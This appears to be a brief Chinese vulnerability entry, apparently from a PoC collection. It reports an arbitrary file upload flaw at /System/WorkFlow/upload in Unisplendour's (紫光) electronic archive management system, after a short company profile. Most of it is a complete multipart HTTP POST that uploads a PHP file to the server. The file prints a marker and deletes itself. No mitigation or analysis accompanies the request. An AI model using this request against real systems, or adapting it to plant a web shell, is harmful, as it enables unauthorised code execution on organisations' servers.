漏洞描述
紫光软件系统有限公司是紫光股份有限公司的控股子公司,紫光股份有限公司是主营IT和通讯业务的A股上市公司,是国家520户重点企业、国家重点高新技术企业、国家863计划成果产业化基地、全国电子信息“百强”企业。曾荣获国家技术发明奖、北京市名牌产品等数十项奖励。
紫光电子档案管理系统 /System/WorkFlow/upload 文件上传漏洞
PoC代码
POST /System/WorkFlow/upload.html?token=5117e82385cef4c12547fdd4c028b97a1-1 HTTP/1.1
Host:
Accept: */*
Accept-Encoding: gzip, deflate
Connection: keep-alive
Content-Length: 566
Content-Type: multipart/form-data; boundary=vow8ojiofbpypwih3t3i
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/[REDACTED] Safari/537.36
--vow8ojiofbpypwih3t3i
Content-Disposition: form-data; name="userID"
admin
--vow8ojiofbpypwih3t3i
Content-Disposition: form-data; name="fondsid"
1
--vow8ojiofbpypwih3t3i
Content-Disposition: form-data; name="comid"
1
--vow8ojiofbpypwih3t3i
Content-Disposition: form-data; name="token"
affe447f075bac53a7e568e833391e67
--vow8ojiofbpypwih3t3i
Content-Disposition: form-data; name="Filedata"; filename="wizjbifuta.php"
Content-Type: multipart/form-data
<?php echo "2ccASC47CJ474cqTBuzA0q6FCAS";unlink(__FILE__); ?>
--vow8ojiofbpypwih3t3i--